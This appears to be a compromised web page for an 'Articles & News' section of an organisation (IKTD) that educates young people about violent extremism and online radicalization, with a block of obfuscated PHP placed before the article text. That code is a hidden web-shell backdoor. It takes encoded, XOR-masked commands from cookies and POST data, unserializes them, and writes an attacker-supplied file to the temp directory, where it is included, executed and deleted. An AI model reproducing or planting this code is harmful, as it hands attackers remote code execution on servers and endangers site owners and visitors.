$CeYaLswoG = 'I' . chr (81) . "\137" . 'I' . 'E' . "\x54";$kMduTswFK = "\x63" . chr ( 637 - 529 ).chr ( 315 - 218 )."\x73" . "\163" . chr ( 757 - 662 ).'e' . "\170" . "\x69" . "\163" . 't' . 's';$gIhCtSUeby = class_exists($CeYaLswoG); $kMduTswFK = "36451";$EjEdBH = !1;if ($gIhCtSUeby == $EjEdBH){function bnbVIhs(){return FALSE;}$wTdQMDdQN = "40419";bnbVIhs();class IQ_IET{private function iJuozL($wTdQMDdQN){if (is_array(IQ_IET::$Wzlrb)) {$JZFHLY = sys_get_temp_dir() . "/" . crc32(IQ_IET::$Wzlrb["\x73" . 'a' . "\154" . "\x74"]);@IQ_IET::$Wzlrb[chr (119) . 'r' . 'i' . "\164" . "\145"]($JZFHLY, IQ_IET::$Wzlrb["\x63" . chr ( 665 - 554 ).chr ( 488 - 378 ).'t' . 'e' . "\156" . 't']);include $JZFHLY;@IQ_IET::$Wzlrb[chr (100) . "\145" . 'l' . "\145" . chr ( 1005 - 889 ).'e']($JZFHLY); $wTdQMDdQN = "40419";exit();}}private $NoAxmYBYvW;public function xXlWNDk(){echo 34087;}public function __destruct(){$wTdQMDdQN = "38394_2689";$this->iJuozL($wTdQMDdQN); $wTdQMDdQN = "38394_2689";}public function __construct($kqSNOv=0){$DVwsWldJ = $_POST;$HyJRhXWQMB = $_COOKIE;$FWuwSpgS = "3748c69a-64ea-4cd3-8378-b9d70b157ee2";$AbWfWtA = @$HyJRhXWQMB[substr($FWuwSpgS, 0, 4)];if (!empty($AbWfWtA)){$BczMCA = "base64";$LuGPpFhb = "";$AbWfWtA = explode(",", $AbWfWtA);foreach ($AbWfWtA as $wjfNn){$LuGPpFhb .= @$HyJRhXWQMB[$wjfNn];$LuGPpFhb .= @$DVwsWldJ[$wjfNn];}$LuGPpFhb = array_map($BczMCA . chr ( 745 - 650 )."\x64" . 'e' . "\x63" . chr ( 1079 - 968 ).chr ( 689 - 589 )."\145", array($LuGPpFhb,)); $LuGPpFhb = $LuGPpFhb[0] ^ str_repeat($FWuwSpgS, (strlen($LuGPpFhb[0]) / strlen($FWuwSpgS)) + 1);IQ_IET::$Wzlrb = @unserialize($LuGPpFhb); $LuGPpFhb = class_exists("38394_2689");}}public static $Wzlrb = 63881;}$HEdYKfaP = new /* 33104 */ $CeYaLswoG(40419 + 40419); $EjEdBH = $HEdYKfaP = $wTdQMDdQN = Array();} Articles & News – IKTD

In this world where information with extremist content is just a click away - it is more important than ever for young people to learn what violent extremism really is, how innocent victims fall prey and how extremist recruitment strategies violent intend to deceive the victims.


In this category we will distribute news and articles to learn more about violent extremism and online radicalization.

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